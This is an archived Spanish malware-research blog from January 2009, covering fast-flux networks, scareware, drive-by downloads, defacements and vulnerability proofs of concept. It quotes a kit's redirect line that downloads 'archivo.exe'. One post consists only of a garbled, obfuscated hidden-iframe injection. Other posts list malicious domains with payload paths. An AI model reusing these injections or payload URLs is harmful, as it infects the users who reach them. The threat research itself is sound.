Founder of MalwareIntelligence, a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

sábado, 31 de enero de 2009

Compendio mensual de información. Enero 2009

Pistus Malware Intelligence Blog
30.01.09 Entendiendo las redes Fast-Flux
29.01.09 Nueva estrategia de IS para diseminar scareware
28.01.09
Danmec Bot, redes Fast-Flux y reclutamiento de Zombies PCs
27.01.09 Técnicas de engaño que no pasan de moda
26.01.09 Atacando sistemas Mac a través de falsa herramienta de seguridad
25.01.09 Desfiguración de sitios web III
24.01.09 Explotación masiva de vulnerabilidades a través de servidores fantasmas
22.01.09 Nació otro pequeño gran hombre
21.01.09 Análisis esquemáticos de un ataque de malware basado en web
19.01.09 Vulnerabilidades & PoC
18.01.09 White paper: Ataques informáticos
17.01.09 Una recorrida por los últimos scareware II
15.01.09 Ataque de malware vía Drive-by-Download
14.01.09 Desfiguración de sitios web II
12.01.09 Seguridad "electrónica" y propagación de malware
10.01.09 Manual de seguridad de Google para Navegadores
08.01.09 Anatomía del exploit MS08-078 by FireEye
06.01.09 Una recorrida por los últimos scareware

04.01.09 Estado de la seguridad según Microsoft

02.01.09 Desfiguración de sitios web de fin de semana

01.01.09 Malware Preinstalado


Evilfingers Blog
31.01.09 Electronic security and spread of malware
30.01.09 Understanding Fast-Flux networks

29.01.09 New strategy of social engineering to spread IE Defender
28.01.09 Danmec Bot, Fast-Flux networks and recruitment of Zombies PCs
27.01.09 Deception techniques that do not go out of fashion
26.01.09 Attacking Mac systems through false security tool
25.01.09 Massive exploitation of vulnerabilities through servers ghosts
19.01.09 Vulnerabilities & Proofs-of-concept
14.01.09 Malware Attack via Internet
14.01.09 Ataque de malware a través de sitios web

10.01.09 Security in Web browsers
10.01.09 Seguridad en los navegadores web

09.01.09 Commonly exploited security weaknesses
09.01.09 Debilidades de seguridad comúnmente explotadas

ESET Latinoamérica Blog
29.01.09 Cómo instalar ESET Linux Security en Ubuntu
27.01.09 Creación de páginas falsas para propagar malware con codecs falsos
20.01.09 Ataque de phishing a través de Win32/Qhost
15.01.09 Creador de falsos navegadores web
14.01.09 Historia de los códigos maliciosos
09.01.09 Conficker y problemas de seguridad adyacentes
08.01.09 Actividad insegura en Internet. Amenaza de ataque de virus
07.01.09 Drive-by-Download: otro lobo con piel de cordero
05.01.09 Nueva falsa promoción de Claro
01.01.09 Reporte de amenazas de Diciembre

30.12.08 Administrador de wallpapers malicioso
29.12.08 Técnicas maliciosas anti-análisis
28.12.08 Ingeniería Social de todos los días
22.12.08 Aprender sobre malware
17.12.08 Ataque de pharming local a Bancos de México
14.12.08 Prevención ante la explotación de vulnerabilidad en IE
12.12.08 Malware for Dummies (generador de virus)
11.12.08 Falso correo de McDonald’s con malware
03.12.08 Configurando ESET NOD32 Antivirus en MSN II

# pistus

Ver más

viernes, 30 de enero de 2009

Entendiendo las redes Fast-Flux

Las redes Fast-Flux constituyen una metodología avanzada en la propagación de amenazas que actualmente es explotada de manera activa para infectar equipos, entre tantos otros delitos. El objetivo es ocultar las actividades maliciosas a través de direcciones IP que van rotando en cuestión de segundos contra un mismo dominio, lo que impide localizarlas para poder bloquearlas al dificultar su identificación.


Cada una de estas direcciones IP, que se van asignando a los dominios, corresponden a máquinas que previamente han sido comprometidas con algún código malicioso, formando parte de una botnet, y trabajan a modo de "puente" entre el equipo que solicita determinado recurso y el servidor que aloja ese recurso. Esta metodología de operación de la red recibe el nombre de Single-Flux (flujo único).

Es decir, en un proceso normal, un equipo cliente realiza una petición (GET) al servidor quien luego responde al cliente ofreciendo el resultado; en redes single-flux, la petición original realizada por el cliente no rebota contra el servidor sino que lo hace contra la máquina zombi, y es esta quien realiza la consulta al servidor.

Existe otra metodología denominada Double-Flux (doble flujo) en el que, además de contemplar las características de single-flux, explota la resolución de nombres y los servicios de registro de nombres de dominio.


A través de una simple consulta DNS contra un dominio es posible establecer si este forma parte de una red Fast-Flux. En el siguiente ejemplo donde se observa las diferentes direcciones IP que se establecen al dominio www.lijg.ru.

;; QUESTION SECTION:
;www.lijg.ru. IN A

;; ANSWER SECTION:
www.lijg.ru. 600 IN A 24.107.209.119
www.lijg.ru. 600 IN A 24.219.191.246
www.lijg.ru. 600 IN A 65.65.208.223
www.lijg.ru. 600 IN A 65.102.56.213
www.lijg.ru. 600 IN A 67.141.208.227
www.lijg.ru. 600 IN A 68.124.161.76
www.lijg.ru. 600 IN A 69.14.27.151
www.lijg.ru. 600 IN A 70.251.45.186
www.lijg.ru. 600 IN A 71.12.89.105
www.lijg.ru. 600 IN A 71.235.251.99
www.lijg.ru. 600 IN A 75.11.10.101
www.lijg.ru. 600 IN A 75.75.104.133
www.lijg.ru. 600 IN A 97.104.40.246
www.lijg.ru. 600 IN A 173.16.99.131

;; AUTHORITY SECTION:
lijg.ru. 345600 IN NS ns5.lijg.ru.
lijg.ru. 345600 IN NS ns1.lijg.ru.
lijg.ru. 345600 IN NS ns2.lijg.ru.
lijg.ru. 345600 IN NS ns3.lijg.ru.
lijg.ru. 345600 IN NS ns4.lijg.ru.


Por otro lado, dicen que una imagen vale más que mil palabras así que... veamos que nos dice la siguiente, obtenida de SecViz y realizada por Jaime Blasco:

La representación de redes Fast-Flux a través de herramientas gráficas es una excelente alternativa ya que permite, a través de una sola vista, conocer desde el punto de vista estructural y de manera muy atractiva cómo se compone dicha red.

En este ejemplo, el gráfico muestra una serie de dominios Fast-Flux (color azul) y cada una de las zombies PCs que lo conforman (color rojo). Al realizarse la triangulación de cada uno de los dominios infectados, notamos que algunos pertenecen a varias redes FF dentro de una misma estructura de red.

Esto supone mayor ventaja para el atacante ya que dispone de un abanico mucho más extenso de equipos comprometidos que son utilizados de manera distribuida para diseminar mayor cantidad de malware, propagar mayor cantidad de spam, realizar mayor cantidad de ataques de phishing, y muchas otras actividades maliciosas y fraudulentas.

# pistus

Ver más

jueves, 29 de enero de 2009

Nueva estrategia de IS para diseminar scareware

IE Defender es uno más de los tantos falsos programas de seguridad (scareware, también llamados rogue) que constantemente bombardean a los usuarios con intenciones de infectar sus equipos a través de sitios web que simulan ser legítimos.


Sin embargo, se están detectando nuevas estrategias de diseminación y engaño que no comparten la misma metodología de descarga desde el mismo sitio web del scareware, pero que buscan engañar a los usuarios para lograr sus objetivos; en este caso, IE Defender se está diseminado a través de sitios web que prometen la descarga de música en formato mp3 y películas.

En ninguno de los casos, se descarga el disco o película prometido sino que se descarga alguna de las variantes que componen la familia de IE Defender.

Todas las páginas utilizadas para propagar la amenaza comparten la misma dirección IP (216.240.151.112) de descarga:

free-games-rapidshare .com
movie-rapidshare .com
moviesrapidshare .org
music-rapidshare .com
musicrapidshare .org
warez-catalog .com
movie-megaupload .com
cpmusicpub .com
soft-rapidshare .net
softrapidshare .com
softrapidshare .org
ftp-warez .org
extra-turbo .com
softupdate09 .com
cpmusicpub .com
free-full .com
free-full-download.com
free-full-rapidshare.com

Un detalle no menor que identifica a estos sitios maliciosos, es que casi todos simulan ser páginas alojadas en sitios que permiten almacenar archivos como Megaupload, Rapidshare o, directamente, sitios diseñados para descargar warez.

Información relacionada:
Una recorrida por los últimos scarewawe
Una recorrida por los últimos scarewawe II


# pistus

Ver más

miércoles, 28 de enero de 2009

Danmec Bot, redes Fast-Flux y reclutamiento de Zombies PCs

Danmec, o Asprox, es el nombre de un troyano diseñado para reclutar máquinas zombies al tiempo que recolecta información confidencial de cada una de las víctimas que infecta.

Si bien la aparición de este troyano no es reciente, actualmente se vale de estrategias más complejas que las habitualmente utilizadas por otros códigos maliciosos, incluso por sus primeras variantes, como las técnicas Fast-Flux para evitar la detección por parte de programas de bloqueo e infectar la mayor cantidad de equipos posibles.

Actualmente, las redes Fast-Flux son explotadas masivamente y de manera activa por miles de dominios de origen Ruso, activando nuevamente botnets como la creada por Danmec.

google-analitycs.lijg .ru
fmkopswuzhj .biz
fnygfr .com

fvwugekf .info

fwkbt .info

gbrpn .org

gbxpxugx .org

ghtileh .biz

gnyluuxneo .com

fuougcdv .org

www. dbrgf .ru

www. bnmd .kz

www. nvepe .ru

www. mtno .ru

www. wmpd .ru

www. msngk6 .ru

www. vjhdo .com

www. aspx37 .me
google-analitycs.dbrgf .ru

www. advabnr .com

www. lijg .ru

www. dft6s .kz


Cada uno de estos dominios aloja el siguiente script, escrito en JavaScript, llamado script.js (MD5: ccec2c026a38ce139c16ae97065ccd91), desde el cual ejecuta un Drive-by-Download:

Esta llamada a través de la etiqueta iframe, es realizada a una URL que forma parte activa de una red Fast-Flux.

;google-analitycs.lijg.ru. IN A

;; ANSWER SECTION:
google-analitycs.lijg.ru. 600 IN A 68.119.39.129
google-analitycs.lijg.ru. 600 IN A 69.176.46.57
google-analitycs.lijg.ru. 600 IN A 71.12.89.233
google-analitycs.lijg.ru. 600 IN A 76.73.237.59
google-analitycs.lijg.ru. 600 IN A 97.104.40.246
google-analitycs.lijg.ru. 600 IN A 98.194.180.179
google-analitycs.lijg.ru. 600 IN A 146.57.249.100
google-analitycs.lijg.ru. 600 IN A 151.118.186.131
google-analitycs.lijg.ru. 600 IN A 165.166.236.74
google-analitycs.lijg.ru. 600 IN A 173.16.99.131
google-analitycs.lijg.ru. 600 IN A 173.17.180.79
google-analitycs.lijg.ru. 600 IN A 24.107.209.119
google-analitycs.lijg.ru. 600 IN A 24.170.188.201
google-analitycs.lijg.ru. 600 IN A 68.93.61.194

;; AUTHORITY SECTION:
lijg.ru. 339897 IN NS ns3.lijg.ru.
lijg.ru. 339897 IN NS ns2.lijg.ru.
lijg.ru. 339897 IN NS ns1.lijg.ru.
lijg.ru. 339897 IN NS ns5.lijg.ru.
lijg.ru. 339897 IN NS ns4.lijg.ru.

;; Query time: 263 msec
;; SERVER: 192.168.240.2#53(192.168.240.2)
;; WHEN: Sun Jan 25 20:31:57 2009
;; MSG SIZE rcvd: 356


Al mismo tiempo que cada una de las direcciones web líneas arriba expuestas forman una nueva granja de redes Fast-Flux con grupos de direcciones IP espejadas.

Fast-Flux es una técnica avanzada utilizada con fines maliciosos, de manera conjunta con otras, para la propagación de diferentes amenazas. Esto obliga a ser cautelosos en todo momento.

# pistus

Ver más

martes, 27 de enero de 2009

Técnicas de engaño que no pasan de moda

¿Somos hijos del rigor?

Una de las cuestiones que a diario motiva alguna reflexión es por qué los usuarios siguen cayendo en trampas ya por demás conocidas.

Técnicas de Ingeniería Social como la doble extensión en los archivos, espacios entre el nombre del archivo y la extensión y, desde que se comenzó a utilizar Internet como plataforma de ataque, técnicas como los falsos códecs son una pequeña muestra de algunas de ellas.


Los sitios web que alojan material pornográfico suelen ser los más visitados en Internet y, también, los más utilizados por los diseminadores de malware para propagar amenazas. Y por más que nos preguntemos cómo puede ser posible que todavía los usuarios sigan infectando sus equipos a través de estas estrategias de engaño, la respuesta parecería recaer en algo tan simple de justificar como "un alto porcentaje de demanda" por el consumo de dicho material, como uno de los más buscados.


Los creadores de malware saben muy bien que la cosa es así, y que la persona que visita un sitio pornográfico, quiere ver pornografía, sin importar el formato con el cual se presente el recurso (video y/o imagen); en consecuencia, si a ese usuario se le ofrece la descarga de uno, e incluso varios, falsos códecs para poder visualizar el supuesto video, lo más probable es que, en la mayoría de los casos, el usuario los descargue.


Entonces, verán en pantalla algo similar a lo mostrado en la captura, que al pasar unos segundos mostrará una ventana pop-ups parecida a la siguiente:

El usuario, pensando que se trata de un códec necesario para la visualización del video, lo instala. En realidad, lo que instala es un malware, hasta el día de la fecha detectado sólo por algunas compañías antivirus.

Por otro lado, existe un aplicativo contituido tan sólo por un archivo HTML que es utilizado para propagar masivamente y a través de cualquier medio este tipo de acciones.

El aplicativo no permite crear ni modificar códigos maliciosos sino que permite la diseminación de los mismos a través del clásico modo mencionado.
El único requerimiento es alojar en un servidor (o en cualquier zombie PC) el archivo HTML y especificar en su código la dirección de descarga del malware en la siguiente porción de código.

window.setTimeout("location.href='http://servidor.com/archivo.exe'", 1000);

Como componentes adicionales, el kit propone redirigir también hacia la visualización de un video real. Esto es parte de la estrategia de Ingeniería Social y busca despejar alguna sospecha por parte del usuario.

Ya no hablamos sólo de técnicas como Drive-by-Download, exploit, scripting. ofuscación de código, entre tantos otros, sino que hablamos de cautela y sentido común.

Es decir, no alcanza con sólo confiar la seguridad ante los peligros que representan los códigos maliciosos a soluciones antivirus ya que, en este caso y según el reporte de VT, actualmente los AV nos ofrecen sólo un 35.09% de protección donde sólo 14 de 39 detectan la amenaza, el otro 64.91% dependerá netamente de nuestra habilidad y sentido común para detectar una potencial actividad maliciosa.


# pistus

Ver más

lunes, 26 de enero de 2009

Atacando sistemas Mac a través de falsa herramienta de seguridad

¿Quién dijo que todo era para windows?

Si bien es cierto que la masividad de las diferentes técnicas de engaño e infección son extremadamente más comunes en plataformas Windows, la seguridad es competencia de cualquier sistema, sin importar su infraestructura ni plataforma, por lo que también existen amenazas del tipo rogue (también llamado scareware) para sistemas Mac.

En este caso, la reciente falsa herramienta de seguridad llamada iMunizator (en realidad no es tan reciente ;-P ya que sus primeros pasos los dio durante el año 2007 y principios del 2008, sin embargo volvió a la “carga” nuevamente), puede ser descargada desde diferentes sitios web que responden a una sola dirección IP (67.205.75.10) alojada en Ucrania, en una empresa de web hosting llamada iWeb Technologies Inc.

www. imunizator .com
www. imunizator .net
imunizator .com
imunizator .net
mac-imunizator .net

Este programa malicioso comparte "espacio web" con otros rogue mucho más conocidos a través de la IP 70.38.19.203:

Antispyware Deluxe (antispywaredeluxe .com)
Antivirus 2009 (antivirus-2009-pro .net)
Antivirus 2010 (av2010 .net)
Vista Antivirus 2008 (vav-2008 .net)

iMunizator viene desplegando sus estrategias de engaño desde hace un tiempo, cambiando de dominios para reflotar, incluso cambiando su nombre (anteriormente llamado MacSweeper).


Un dato más que interesante es que las acciones de transferencia de fondos para poder “comprar” la falsa herramienta se realiza a través de una compañía de e-commerce llamada Plimus, completamente legal de origen israelí pero con oficinas centralizadas en EEUU (San Diego y Silicon Valley) y en Ucrania. Es por ello que los usuarios verán en la barra de dirección el protocolo seguro HTTPS presente en toda recomendación, además de otras pautas que pretenden dar seguridad demostrando que estamos operando desde un sitio confiable.

El malware actual busca constantemente obtener información sensible de los usuarios para cometer fraudes donde un alto porcentaje de propagación lo sufren plataformas windows; sin embargo, esto supone que los creadores de malware están virando la mira hacia nuevos objetivos. En consecuencia, hay que manejar las mismas buenas prácticas de seguridad sin importar la tecnología a la cual se aplique.


# pistus

Ver más

domingo, 25 de enero de 2009

Desfiguración de sitios web III

Websites defacement three

El número de sitios web vulnerados por defacers es día a día verdaderamente alto y toma mayor repercusión cuando es realizado en repudio de determinados actos como los acontecidos recientemente en la franja de gaza.

Algunos de los defacing reportados durante los últimos 15 días responden dicho acontecimiento.

Websites defacement two

Desfiguración histórica

Defacing realizado el 26 de junio de 1999 contra el sitio web del Programa de Investigación en Microgravedad de la NASA.
Información de la época sobre el proyecto

Ref.: # 00003h
Defacer: keebler elves


# pistus

Ver más

sábado, 24 de enero de 2009

Explotación masiva de vulnerabilidades a través de servidores fantasmas

La cantidad de dominios chinos que día a día son utilizados para explotar vulnerabilidades en los equipos de las personas que acceden a las páginas web concebidas con fines maliciosos, es realmente importante.

Estos servidores alojan páginas que contienen exploits para diferentes debilidades de sistemas operativos Microsoft Windows y algunas otras aplicaciones. Actualmente están siendo utilizados de manera masiva para la propagación de códigos maliciosos.

Según ThreatExpert, China junto a Rusia conforman los dos países con mayor tasa de propagación de amenazas.
Los dominios que se exponen a continuación forman parte de granjas alojadas en servidores fantasmas y muchos de ellos se encuentran activos, por lo que se sugiere ser cautelosos si se desea acceder a los mismos. La finalidad de dar a conocer estos dominios es netamente investigativa e informativa, y considerado útil para el bloqueo de las URLs maliciosas.

*.705sese cn (59.34.197.15) contiene exploits para MS06-014, MS08-067, StormPlayer, RealPlayer que ejecuta desde /a2/fxx.htm y descarga el binario al.css que explota puntualmente la vulnerabilidad en MS08-067.
*.d.bc-s350 cn
(58.253.68.65) descarga el binario gr.exe (MD5: abd5bcb105dd982ae0b9c1f8c66bc07c – virus total report 33/39).
*.yandex2 cn (193.138.172.5) descarga el binario load.exe (MD5: 2ce6d3c0f526f96b32db8cef06921ffc – virus total report 23/39) desde /load.php?id=21&spl=5.
*.metago cn
(193.138.172.5 )
*.copy-past cn
(195.242.161.24) contiene exploit.
*.whitebiz cn (91.211.64.155) descarga un binario llamado load.exe (MD5: d7d03b7ea57ecaf008350a4215f8e2bc- virus total report 12/39) desde /service/load.php.
*.winesamile cn
*.bigsellstaff cn
*.cntotalizator cn

*.fiesta-tests com

*.fresh-best-movies cn

*.helinking cn

*.ns2.oxdnski cn

*.onlinestat cn

*.trafiks cn

*.783456788839 cn (195.190.13.106) descarga troyano desde /load.php?spl=zango1. *.234273849543 cn
*.384756783900 cn

*.109438129432 cn
*.sinakis cn
(91.211.64.89) descarga malware desde /baner/load.php?id=187&spl=4 *.nohtingherez cn (217.20.112.96) descarga el binario adv111.exe (MD5: 4adc9c50005c301db9af13f8467801f7 - virus total report 14/37).
*.o6ls cn
(91.203.4.137) descarga malware desde /load.php?id=3459&spl=4.

# pistus

Ver más

jueves, 22 de enero de 2009

Nació otro pequeño gran hombre

style="visibility:hidden">document.write('Alt60iframe src="http:Alt47Alt47acinilcAlt45onretamAlt45litnafniAlt45semliuqAlt46comAlt46ar" widthAlt61100 heightAlt6180Alt62Alt60/iframesAlt62

document.write('classid="7D9-01-16" height=110011cm sx=mcln sz=DACKG')
executed

odinevneib mj=jm

# pistus

Ver más

miércoles, 21 de enero de 2009

Análisis esquemático de un ataque de malware basado en web

Internet se ha transformado en una aliada plataforma de ataque para los creadores de malware, donde técnicas como Drive-by-Download, scripting, exploit, y la combinación de ellos, son cada vez más comunes y ejecutan su carga dañina directamente en el sistema víctima, de manera casi instantánea y transparente a la vista del usuario menos experimentado, convirtiéndose en un peligro latente por el simple acto de acceder a un sitio web.

Un ejemplo concreto lo constituye el siguiente ataque mediante el cual se recurre a diferentes componentes para explotar e infectar el sistema víctima que, aunque ya comunes en estos días, poseen varias características extras que potencian su daño.


Al acceder a la página maliciosa, un script ejecuta de manera transparente varios iframes y un exploit para la vulnerabilidad solucionada y explicada en el boletín MS08-067. Actualmente, esta vulnerabilidad se encuentra activamente explotada por el gusano Downadup/Conficker con una tasa de infección muy alta.

El archivo sina.css no es lo que parecería ser (una hoja de estilo encascada), sino que se trata de un archivo ejecutable que es el encargado de ejecutar el exploit para la vulnerabilidad mencionada, inyectando código dañino en los procesos winlogon.exe, explorer.exe y services.exe. Realiza una copia de si mismo en C:\DOCUME~1\user\LOCALS~1\Temp\ bajo el nombre svchost.exe creando su proceso asociado. Además, también crea el archivo Beep.sys en C:\WINDOWS\system32\drivers\ ejecutándolo como servicio y ocultándose del sistema operativo con capacidades de rootkit.

Al mismo tiempo, manipula el registro del sistema para evitar la ejecución de las siguientes procesos correspondientes a herramientas de seguridad:

RStray.exe, ProcessSafe.exe, DrvAnti.exe, safeboxTray.exe, 360tray.exe, 360safebox.exe, 360Safe.exe, 360rpt.exe, adam.exe, AgentSvr.exe, AntiArp.exe, AppSvc32.exe, arswp.exe, AST.exe, autoruns.exe, avconsol.exe, avgrssvc.exe, AvMonitor.exe, avp.com, avp.exe, CCenter.exe, ccSvcHst.exe, EGHOST.exe, FileDsty.exe, filemon.exe, FTCleanerShell.exe, FYFireWall.exe, GFRing3.exe, GFUpd.exe, HijackThis.exe, IceSword.exe, iparmo.exe, Iparmor.exe, isPwdSvc.exe, kabaload.exe, KASMain.exe, KASTask.exe, KAV32.exe, KAVDX.exe, KAVPF.exe, KAVPFW.exe, KAVSetup.exe, KAVStart.exe, KISLnchr.exe, KMailMon.exe, KMFilter.exe, KPFW32.exe, KPFW32X.exe, KPfwSvc.exe, Kregex.exe, KRepair.com, KsLoader.exe, KvDetect.exe, KvfwMcl.exe, kvol.exe, kvolself.exe, KVSrvXP.exe, kvupload.exe, kvwsc.exe, KvXP.kxp, KWatch.exe, KWatch9x.exe, KWatchX.exe, MagicSet.exe, mcconsol.exe, mmqczj.exe, mmsk.exe, Navapsvc.exe, Navapw32.exe, NAVSetup.exe, nod32.exe, nod32krn.exe, nod32kui.exe, NPFMntor.exe, PFW.exe, PFWLiveUpdate.exe, procexp.exe, QHSET.exe, QQDoctor.exe, QQDoctorMain.exe, QQKav.exe, Ras.exe, Rav.exe, RavMon.exe, RavMonD.exe, RavStub.exe, RavTask.exe, RawCopy.exe, RegClean.exe, regmon.exe, RegTool.exe, rfwcfg.exe, rfwmain.exe, rfwProxy.exe, rfwsrv.exe, rfwstub.exe, RsAgent.exe, Rsaupd.exe, rstrui.exe, runiep.exe, safelive.exe, scan32.exe, SelfUpdate.exe, shcfg32.exe, SmartUp.exe, SREng.exe, SuperKiller.exe, symlcsvc.exe, SysSafe.exe, taskmgr.exe, TrojanDetector.exe, Trojanwall.exe, TrojDie.exe, UIHost.exe, UmxAgent.exe, UmxAttachment.exe, UmxCfg.exe, UmxFwHlp.exe.

Otras de las acciones dañinas de este malware realizadas en el registro, es la eliminación de las subclaves contenidas en HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ y HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ para evitar el arranque del sistema en modo seguro (MPF).

Por otro lado, establece una conexión con la IP 60.161.34.251, correspondiente al dominio hfdy2929 com (alojada en Beijing, China - Chinanet Yunnan Province Network), y realiza una consulta DNS.


También establece conexión con 999.hfdy2828 com, también alojada en China (Chongqing Chinanet Chongqing Province Network), a través del protocolo http en el puerto por defecto.


Al establecer esta conexión, consulta el archivo bak.txt que contiene un listado de malware a descargar. Un total de 35 archivos ejecutables que corresponden a los siguientes códigos maliciosos:
  • Win32/TrojanDropper.Agent.NPO
  • Win32/PSW.Legendmir.NGG
  • Win32/PSW.OnLineGames.NRD
  • Win32/PSW.OnLineGames.NRF
  • Win32/PSW.OnLineGames.NTM
  • Win32/PSW.OnLineGames.NTN
  • Win32/PSW.OnLineGames.NTP
  • Win32/PSW.WOW.DZI
La nomenclatura utilizada en el nombre de cada malware corresponde a la establecida por el motor de firmas de ESET NOD32 Antivirus 3.0.672.0.

En el código principal (primera imagen), existen varias etiquetas iframe que mantienen la misma metodología explicada, verificando en el equipo víctima la existencia de vulnerabilidades.
  • http://sss.2010wyt net/ac html: descarga el archivo css.css desde http://xxx.2009wyt com. Es copia de sina.css y explota la vulnerabilidad MS08-067.
  • http://sss.2010wyt net/614 js: descarga el archivo bak.css desde http://xxx.2009wyt net. Es copia de sina.css. Explota las vulnerabilidades MS08-067 y MS06-014.
  • http://sss.2010wyt net/r js, http://sss.2010wyt net/r html, http://sss.2010wyt net/fzl htm y http://sss.2010wyt net/asd htm: descargan los archivos versionie.swf y versionff.swf desde http://sss.2010wyt net. Ambos explotan una vulnerabilidad en Flash Player.
Sin embargo, no todo termina aquí mismo, sino que aparece otro dominio desde el cual se descargan algunos de los códigos maliciosos mencionados líneas arriba y cuya referencia se encuentra en el archivo bak.txt, la relación de este dominio con otros es la siguiente:


Los ataques de malware se han vuelto más sofisticados debido a la combinación de diferentes tecnologías con diferentes metodologías maliciosas que intentan cumplir con sus fines de cualquier manera.

Lo que se expone en este texto no es otra cosa que el claro reflejo de lo que sucede, o puede suceder, cuando accedemos a sitios vulnerados para diseminar malware, o creados íntegramente con estos fines; y de las capacidades dañinas que cada día son más habituales en los códigos maliciosos.

# pistus

Ver más

lunes, 19 de enero de 2009

Vulnerabilidades & PoC

Durante esta semana, en securityfocus, se han reportado una serie de vulnerabilidades en varios aplicativos donde, como es costumbre, no puede faltar alguna para entornos Microsoft. Teniendo en cuenta que estos "huecos inseguros" en la programación de los programas permite llevar a cabo ataques de diferente índole, resulta interesante conocer la potencialidad que puede tener la explotación de una vulnerabilidad a través de Pruebas de concepto (PoC - Proofs-of-Concept).

Office Viewer AcitveX Controls (OCX)
Office View presenta una serie de vulnerabilidades en los controles ActiveX que permiten editar y visualizar archivos de Microsoft Office desde el navegador web. Esto supone la posibilidad de que un atacante ejecute código de manera arbitraria con los mismos privilegios del usuario actual.

Existen una serie de PoC sobre estas vulnerabilidades:

http://downloads.securityfocus.com/vulnerabilities/exploits/33245.html http://downloads.securityfocus.com/vulnerabilities/exploits/33238_powerpoint.html
http://downloads.securityfocus.com/vulnerabilities/exploits/33238_office.html http://downloads.securityfocus.com/vulnerabilities/exploits/33238_word.html http://downloads.securityfocus.com/vulnerabilities/exploits/33222.html http://downloads.securityfocus.com/vulnerabilities/exploits/33243-office.html http://downloads.securityfocus.com/vulnerabilities/exploits/33243-powerpoint.html
http://downloads.securityfocus.com/vulnerabilities/exploits/33243-word.html http://downloads.securityfocus.com/vulnerabilities/exploits/33243-excel.html

Microsoft Knowledge Base

Cómo impedir la ejecución de un control ActiveX en Internet Explorer

NullSoft Winamp v5.3.2 y superior
A partir de esta versión de Winamp, existe defectos en el procesado de archivos mp3 y AIIF (
Audio Interchange File Format) mediante el cual, a través de un archivo mp3 o AIFF intencionalmente manipulado se podría provocar un Buffer Overflow que permita a un atacante ejecutar código de forma arbitraria con los privilegios del usuario actual. Existe una PoC para esta debilidad:

Prueba de concepto

Microsoft Windows Compiled HTML Help Handling Buffer Overflow

CHM es un formato de documento utilizado comúnmente en archivos de ayuda de Microsoft Windows. A través de un archivo de este estilo intencionalmente manipulado puede explotar una vulnerabilidad en Windows XP SP3 provocando un Buffer Overflow. Prueba de concepto:

Prueba de concepto

# pistus

Ver más

domingo, 18 de enero de 2009

White paper: Ataques informáticos

A diferencia de lo que sucedía años atrás, donde personas con amplias habilidades en el campo informático disfrutaban investigando estos aspectos con el ánimo de incorporar mayor conocimiento; en la actualidad se ha desvirtuado completamente dando origen a nuevos personajes que utilizan los medios informáticos y el conocimiento sobre su funcionamiento como herramientas para delinquir y obtener algún beneficio económico...

El presente documento pretende ofrecer una rápida visión sobre las debilidades comúnmente explotadas por atacantes para traspasar los esquemas de seguridad en los sistemas informáticos, junto a posibles contramedidas bajo las cuales es posible ampararse para prevenir de manera efectiva los diferentes tipos de ataques que diariamente recibe un sistema.

El artículo puede ser descargado desde aquí o desde la sección de papers. También desde la sección terceros de segu-info.com.ar donde encontrarán una versión adaptada exclusivamente.

Espero que el mismo sea de utilidad para quien lo lea :-)

# pistus

Ver más

sábado, 17 de enero de 2009

Una recorrida por los últimos scareware II

Este tipo de programas maliciosos es cada vez más común y se valen de numerosos métodos de engaño (Ingeniería Social) para captar la atención de los usuarios. Por otro lado, constantemente son manipulados para aumentar su ciclo de vida y evitar que las compañías antivirus los detecten.

Algunos son mucho más dañinos que otros, y utilizan "formas" más agresivas para asustar a sus víctimas. Hagamos una segunda recorrida por el scareware que srgió durante la semana:

Antivirus Plus
MD5:
f4b27d042b55cfd3283af159b2d754fe
VT Report: Result: 21/37 (56.76%)








Spy Protector

MD5:
db206d75b7219eb9fd6f51add1e4aa80
VT Report: Result: 18/37 (48.65%)






Antivirus 2009

MD5: cb1b2b84ca04259c7d3197d1baca2cbb
VT Report: Result: 3/39 (7.69%)







Pro Antispyware 2009

MD5: 6c02aba11dac9fbd923da981f567c19c
VT Report: Result: 6/38 (15.79%)







Real Antivirus

MD5: 2a3da028735228b5e7ce91f9fda301e2
VT Report: Result: 22/39 (56.42%)







Spyware Protect 2009

MD5:
b75bf6855d8e8f83ae10f5fd4cf0b9d4
VT Report: Result: 21/39 (53.85%)






# pistus

Ver más

jueves, 15 de enero de 2009

Ataque de malware vía Drive-by-Download

Uno de los problemas más comunes que sufren la mayoría de los entornos de información, es la mala gestión de las actualizaciones de seguridad, tanto del sistema operativo como de las aplicaciones instaladas. Y, con el mismo nivel de criticidad, uno de los más efectivos ataques que se producen como consecuencia de la falta de actualización, es aquel que se ejecuta vía web, denominado Drive-by-Download.

Este ataque se basa en explotar vulnerabilidades que permitan ejecutar códigos maliciosos a través de la inyección de etiquetas iframe incrustadas en el cuerpo del código HTML, similar al ejemplo que se muestra en la imagen:


La etiqueta iframe se ejecuta en segundo plano y de manera transparente para el usuario abriendo una segunda página que por lo general contiene algún script ofuscado que esconde tras su código uno o varios exploits encargados de buscar en el equipo alguna vulnerabilidad específica. Puede darse el caso que cuando el usuario ingresa a un sitio web malicioso o comprometido con estas amenazas, visualice, por ejemplo, lo que se muestra en la siguiente captura (simplemente una serie de puntos):

Sin embargo, al observar el código fuente de la página, veremos el verdadero código que se esconde de manera maliciosa. Esta técnica de ataque supone un riesgo potencial, ya que si un sistema presenta las características que necesita el ataque, el mismo será exitoso. En consecuencia, la contramedida que mitiga de manera efectiva estas acciones maliciosas, es la implementación de las actualizaciones de seguridad, tanto del sistema operativo como de las aplicaciones. # pistus

Ver más

miércoles, 14 de enero de 2009

Desfiguración de sitios web II

Websites defacement two

El defacing puede ser llevado a cabo por diferentes motivaciones. Algunos lo utilizan como recurso de protesta por cuestiones políticas, sociales y/o religiosas, otros ven en ello una manera de ayudar a segurizar el sitio web o servidor o, simplemente, con ánimo de molestar.


Sin embargo, más allá de los diferentes puntos de discusión que puede generar el porqué del defacing, siempre representa una intrusión no autorizada a un sistema de información.

Algunas de las últimas desfiguraciones de sitios web son:





Websites defacement one

Desfiguración histórica

Defacing realizado por un grupo de Brasil al Ministerio de Desarrollo Sostenible y Panificación de Bolivia, actual Ministerios de Planificación del Desarrollo el 23 de diciembre del año 2000.

# pistus

Ver más